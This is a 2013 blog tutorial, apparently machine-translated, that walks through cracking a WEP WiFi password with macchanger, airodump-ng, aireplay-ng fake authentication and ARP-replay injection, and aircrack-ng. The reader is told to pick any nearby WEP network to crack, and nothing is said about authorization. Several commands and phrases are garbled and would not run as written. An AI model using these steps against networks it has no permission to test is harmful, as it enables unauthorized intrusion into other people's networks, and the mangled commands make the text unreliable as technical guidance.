Monday, June 24, 2013

How to crack WiFi password using WEP

WEP is a type of password encryption for WiFi. It is already not widely used anymore because it is very weak and easily broken. For learning purposes, this time I will show you how easy it is to crack WiFi password using WEP.

What you need:
A huge wireless adapter that can do packet injection. Usually the built-in wireless adapter your laptop does not have this function, so you have to get it from the store or online. I use Alfa AWUS050NH that I bought from eBay, about RM70.
Linux as an operating system. You can also use the BackTrack Live CD but I'm more comfortable using Linux Ubuntu completely.

This tutorial is easier to follow if you are familiar with Linux, as well as common use command line in Linux. I will only enter the most important direction only, but usually you'll probably need to install some software to ensure successful.
Ways crack WiFi password using WEP

1. Open the terminal. First of all, you need to get the name of your wireless adapter interfaces for:airmon-ng

On my computer, the interface for my wireless adapter is wlan1. Your computer may be different, so remember the name to be used in subsequent commands.

2. Run the following command. Substituting (interface) with a new name you can last.airmon-ng stop (interface) ifconfig (interface) down macchanger - march 00:11:22:33:44:55 (interface) airmon-ng start (interface)




3. List all the calls that are nearby.airodump-ng (interface)




Select the WiFi network you want to crack the case, and copy the BSSID, channel, and network name. Make sure you select the network using WEP.

4. Run the following command using the new information you can last. Use whatever name you want for the file (filename). Let this process run.airodump-ng-c (channel)-w (filename) - BSSID (BSSID) (interface)




5. Open a terminal and run the other direction in turn. (Essid) is the name of your WiFi rangkian like crack.aireplay-ng -1 0-a (BSSID)-h 00:11:22:33:44:55-e (Essid) (interface)

If it is successful, the message "Association Successful" will be displayed.



6. Run this command to start collecting data about WiFi password that you want to crack.aireplay-ng -3-b (BSSID)-h 00:11:22:33:44:55 (interface)




7. Return to the screen in step 4 and noticed the # data. Wait until the division managed to gather around 10'000 data before you go to the next step. This process usually takes only about 5 to 10 minutes.

8. After collecting enough data, it's time to get a password. Open another terminal and route instructions.aircrack-ng-b (BSSID) (name fail.cap)



If successful, the message "Key Found" will be displayed with your successfully crack the password. You have succeeded!

Reference: Lifehacker
Update: If you have a problem with the channel, use this command to change the channel of your wireless interface. (interface) is a wireless interface card, and $ is the channel number:ifconfig (interface) down iwconfig (interface) mode managed ifconfig (Interface) up iwconfig (interface) channel $ ifconfig (interface) down iwconfig (interface) mode monitor ifconfig (Interface) up

Reference: Ubuntu Forums